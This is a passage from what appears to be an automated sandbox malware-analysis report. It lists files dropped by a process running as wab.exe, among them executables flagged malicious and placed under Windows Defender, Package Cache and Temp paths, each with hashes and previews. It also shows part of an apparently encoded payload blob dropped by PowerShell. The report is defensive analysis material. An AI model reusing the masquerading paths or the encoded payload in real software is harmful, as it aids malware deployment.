                                                                              Entropy (8bit):6.283298841131721
                                                                              Encrypted:false
                                                                              SSDEEP:24576:x7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:5Z1tKTwMZJ1XBsn/UC6dugWA
                                                                              MD5:8CFAB955578F236C5CDB06D461AE2049
                                                                              SHA1:E7E38519DB3CAC5935215176B8654BEC267FD6B1
                                                                              SHA-256:EAFC0DEE1D623B6DE32FFA7154CFD9AD4414350C0E2E2E5468C9B7BC03F9A923
                                                                              SHA-512:59FDA248B4FE21C505873AFEB88EA3A1A545A5EB69C6C8083A302F7FE6A8AE9CEF39EE29B95EA32CDB3F6B1F7B115C716BF3C82676556ADBDD2842A50265294B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):224632
                                                                              Entropy (8bit):5.346658740278611
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3FtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Stx0SA+EySaQKeUz41
                                                                              MD5:5936E6A9592A373B502A4F40CEB5D274
                                                                              SHA1:BD0C0A126F79B77E6461668546FFB4B5702BFAB1
                                                                              SHA-256:CFBB8E8FB6B042DB6E2293FDE43FA24B9AE2670AD0445A56DE3214E4901088F7
                                                                              SHA-512:DABABC717ACD000A418A2D118EE497C65C62B1FAF4318BAF1DB53CA0D06F88F563CDAFFDF9DEB73680179EB0CED2E45F3A22B865F6B655B299CFC0450820CE08
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):431336
                                                                              Entropy (8bit):5.752299246327897
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOV3:lzBRnCBOrsBOBf
                                                                              MD5:D5945FAB44111E3D0DB2861C8AC32EDC
                                                                              SHA1:FB811D4D198C79FB29A359045415EDDA3C49E877
                                                                              SHA-256:A059F0CC641E7736354E4A12A830D51A930E5118AA1B95E70F1EE1486733B931
                                                                              SHA-512:4C05B14F24C1720AB7A11A982C4955D6AB395CA272927810EB4AC53AD97C577E23902340947014EB99D9E39F1FBBB09C83A185158190800A097B33711A22606B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):175160
                                                                              Entropy (8bit):5.636057353438849
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkS/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:NtkIpdA5OfzDUeqx6u
                                                                              MD5:F59DCF1E724D7EA7DFB018B3C71C8D2E
                                                                              SHA1:EB71834CA1B44C7C11FCA8A77BD8522FA967A8CD
                                                                              SHA-256:EA930FA7ABE8831AC22AEF0BF777A332DFCB013A44780E313C6659AEC0D52A73
                                                                              SHA-512:6C1D461DDFA42DD74847008B02D1EECA1B311BCE14FF1D139E22A0120CBFF7FF0AA0695BCA6B111236794B0616E9B0A42BEF6A3C6B6DEE2C7F4018B162A06F44
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3162480
                                                                              Entropy (8bit):6.453693784011875
                                                                              Encrypted:false
                                                                              SSDEEP:49152:dnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:gs3OBj4UmOH
                                                                              MD5:35EF8966CF2F29F477E46516D8A993FA
                                                                              SHA1:979AD1DB259F4964EC546671FF151062CF61C6F0
                                                                              SHA-256:2BDF1627356719CE8433F93B92B3397D1828CC4BE2D23E991AEEB7758C2FA825
                                                                              SHA-512:CAF7B8F2240F1D1995744F1FCD893E565D747B80D46D1E48BB0B321ACE166D338EF566CAD1BA441DF8FDE91FC8EF6BA7AB7F198755717EA6DB67CAE862A4730F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1309408
                                                                              Entropy (8bit):6.458547418142826
                                                                              Encrypted:false
                                                                              SSDEEP:24576:n+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:n4AA4eGua43lgUFrv
                                                                              MD5:FC820BCEC712B78BA14EA3640EE769B2
                                                                              SHA1:FB2466FBD7CDA915B673D193C47273207C3AEF4A
                                                                              SHA-256:7231DBFC40D9873E4BC1DC1BB1009DA4B4B2AC88DECD32C1DDE9972879AF3E80
                                                                              SHA-512:A4D82FAA7F427E76A149CB4A1B71CF8FFE8AB7A2D320036619885DDD3F0FDF28F16D46B34644D89439BC9A3A018D9DBE08970A098A9FC5CF86802427745B5CCA
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):922944
                                                                              Entropy (8bit):6.405617419551067
                                                                              Encrypted:false
                                                                              SSDEEP:12288:r9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:x/BrnYuqFcL3pQ+pDX
                                                                              MD5:C8FAC366154F4FF47A7FBB3FE4BD2B2F
                                                                              SHA1:030C41FCF646FABD9020B957EDB47EE51D723028
                                                                              SHA-256:D0715B811F5141AC52B2ADFD8BE547420A69D37705708EAD803B799D0B3EECEF
                                                                              SHA-512:454C9BACDD6AC22ED99646A851989F2003A983BF70BC36F0BC451271C77F4CF8F63291426F0ACEC9DE63E56274BDFE893FE45F62465D1A39C076355D8DCCB580
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):692064
                                                                              Entropy (8bit):7.130899608128055
                                                                              Encrypted:false
                                                                              SSDEEP:12288:qskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:qsZgjS1hqgSC/izkfFjymk4HM5yJwMK
                                                                              MD5:77555D5F69BB2A59A77A0AE6C4E90E2A
                                                                              SHA1:312A7728F788511414A3AE803DC7EB85C8807FB9
                                                                              SHA-256:B93B5BF45B3FB87F4BCBE2F97B41071C0C68712B3BFA2455C711DF2C9E85B7D4
                                                                              SHA-512:43D39F39C2E6F50866B4B3D9592EB0C3FDE254822A7B9206C11C7C2054BE9023A5116395F0E181A21A5F149A7C9338B4C81DC85B5304841632AC9C5C9D3BFFD4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):11608
                                                                              Entropy (8bit):4.8908305915084105
                                                                              Encrypted:false
                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                              MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                              SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                              SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                              SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllultnxj:NllU
                                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........

                                                                              C:\Users\user\AppData\Local\Temp\3582-490\wab.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):475136
                                                                              Entropy (8bit):6.119576160135665
                                                                              Encrypted:false
                                                                              SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                                              MD5:72AD21D191B58842334D32A381EA7FA8
                                                                              SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                                              SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                                              SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                                              Malicious:false
                                                                              Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bhgphdw.1ud.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huheq42j.rpm.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t42yux4w.3ae.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yovubrcq.imu.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\chrome.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):182272
                                                                              Entropy (8bit):6.486621682985029
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkd4WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:oBmCtnRPF9cCGr/uH0gkSdQB
                                                                              MD5:04712BCBEE377C2B2054D801CC3C4CD2
                                                                              SHA1:93076F652326A517F4D325DD85FAD044A7BEF755
                                                                              SHA-256:B217D6FA0ACE851216ADF5F3CB58A8A03ABFFC15EB1DC6C1F5B11FC99F069BA4
                                                                              SHA-512:334CB034F585CC9A53D6D69136253A3720BB64F3D4C398F40E56AF18DB692DA7800DE0D4B8BDCAFE9B031A3C280432BAF6CEBA1FA1FE5B345887E4E3337038DD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5023.tmp

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                              Category:modified
                                                                              Size (bytes):8
                                                                              Entropy (8bit):3.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:xY:K
                                                                              MD5:9E263FED6A41AC855AF6A28BA53487B0
                                                                              SHA1:B90F41E04A9FAC1F158FEABC75E16708626597CB
                                                                              SHA-256:411AEBB55255DFE1FDD952269D99D386E7DCB945395DC15E3700F16C68FBFB04
                                                                              SHA-512:95B42E09E6A436A864CD02DC4D46CEB988C928B9AFB9AF7F5CA1D1579EE4C0A841FD50EB28B33BD5995FB0F5036CC050F6D943E7E4A4885DB67F91FF6766E164
                                                                              Malicious:false
                                                                              Preview:.Z./..&A

                                                                              C:\Users\user\AppData\Roaming\Klavers.Uen

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):465356
                                                                              Entropy (8bit):5.94994796092683
                                                                              Encrypted:false
                                                                              SSDEEP:12288:3QBHDDhOcJNDjhEkOVtAQXW/EHlZNq8XEZcFJYBSQYCu:g1nNDVTOUQG8HlqyEGFGXYCu
                                                                              MD5:595A09748EC54D46958B4FC48E232E43
                                                                              SHA1:A1C64C8815EDA873408F9E6D51519F46CCD9B6B0
                                                                              SHA-256:C5179F092DCC764D1869E5FDB1A667032C0EF1A6C9DE4B7D1AD30126B2C47A65
                                                                              SHA-512:83DA041C266FB9286A2226A04740310E3CAFADCCA968B4DFAC1494DB111AC3F54580763AF6E4C1A128CBB4363197DD85D26895C1DDDB4BDB46DAAC151FC5038F
                                                                              Malicious:false
                                                                              Preview:6wLuHusCW3S7tKINAOsCJ15xAZsDXCQE6wIJbXEBm7koDesk6wL1/OsCvUaB8S8Ii/frAhfF6wK1k4HpBwVg03EBm3EBm3EBm+sCimO6lx/FKXEBm+sC1afrApC5cQGbMcpxAZvrAuBDiRQL6wKcnXEBm9Hi6wKR0esC6mKDwQTrApjg6wIHb4H5DDA8AnzJ6wKbD+sCVB+LRCQEcQGbcQGbicPrAnrycQGbgcNp6o0AcQGb6wJzArpqSxBwcQGbcQGbgfKjb9ulcQGb6wJv14HyySTL1esCoSJxAZtxAZtxAZvrAifMcQGbiwwQcQGb6wLVXokME3EBm+sCES9C6wKU7OsC4eSB+uzjBAB11OsC2ixxAZuJXCQM6wKSJ+sCJwmB7QADAADrAooPcQGbi1QkCHEBm+sC09yLfCQEcQGbcQGbievrArOr6wJ8PIHDnAAAAOsCFvbrAmlJU+sCbMRxAZtqQOsCGvbrAmNNietxAZvrAncUx4MAAQAAAOBMAusCbSZxAZuBwwABAADrAiyJcQGbU3EBm+sCetqJ6+sCdWJxAZuJuwQBAADrAhsKcQGbgcMEAQAAcQGbcQGbU3EBm+sCbxlq/3EBm3EBm4PCBesC30dxAZsx9usCHNTrAviKMcnrAsPZ6wKv0Ysa6wKgfnEBm0FxAZvrAlhfORwKdfPrAsPTcQGbRnEBm+sCcmqAfAr7uHXdcQGbcQGbi0QK/OsC4GNxAZsp8OsC5wZxAZv/0usCgUNxAZu67OMEAOsCCj/rAir4McDrAolLcQGbi3wkDHEBm3EBm4E0B36tOuzrAu1+cQGbg8AEcQGb6wLbCznQdeTrAjhTcQGbiftxAZvrAhYu/9dxAZvrAsFq+lu/LfdIuwC2fvno/2nyPL2pb2WbFOTwVPy7HS/rFn//XMpXRdi7BRlMB1u56TfsXpyuo/t/u5hzrfNfVGUCEv/pN+yp4dDI/8E37L5ikkAYlOAr+2Y77H5IK/qb

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6222
                                                                              Entropy (8bit):3.7181769263444533
                                                                              Encrypted:false
                                                                              SSDEEP:96:6GgKCNoahkvhkvCCtlfxJNrRJHGfxJNroJHP:6jbnlf/Ef/6
                                                                              MD5:54BCA57240B697520BA0A97BCCED8CC8
                                                                              SHA1:9389A8B071D613F37492818314DD4A5C7535B9A5
                                                                              SHA-256:41A79A8B40E58D5428F2CCB09A0BED3D93EE1A7C2565C7C838D6D203BCDB84D4
                                                                              SHA-512:8DE288F1DCFBE2A469B04E67C6192DFBB38876AF093198C9160C9264F6A947C06E49012D09091087494EE3B60F4DEED887FD8898375346F889F4DD6FE9CE0494
                                                                              Malicious:false
                                                                              Preview:...................................FL..................F.".. ...d..........<...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......}..<....8).<.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C......................%..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................*...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MLVP4399Z0N1N4Y5GS3Y.temp

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6222
                                                                              Entropy (8bit):3.7181769263444533
                                                                              Encrypted:false
                                                                              SSDEEP:96:6GgKCNoahkvhkvCCtlfxJNrRJHGfxJNroJHP:6jbnlf/Ef/6
                                                                              MD5:54BCA57240B697520BA0A97BCCED8CC8
                                                                              SHA1:9389A8B071D613F37492818314DD4A5C7535B9A5
                                                                              SHA-256:41A79A8B40E58D5428F2CCB09A0BED3D93EE1A7C2565C7C838D6D203BCDB84D4
                                                                              SHA-512:8DE288F1DCFBE2A469B04E67C6192DFBB38876AF093198C9160C9264F6A947C06E49012D09091087494EE3B60F4DEED887FD8898375346F889F4DD6FE9CE0494
                                                                              Malicious:false
                                                                              Preview:...................................FL..................F.".. ...d..........<...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......}..<....8).<.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C......................%..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................*...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):1835008
                                                                              Entropy (8bit):4.418964041870103
                                                                              Encrypted:false
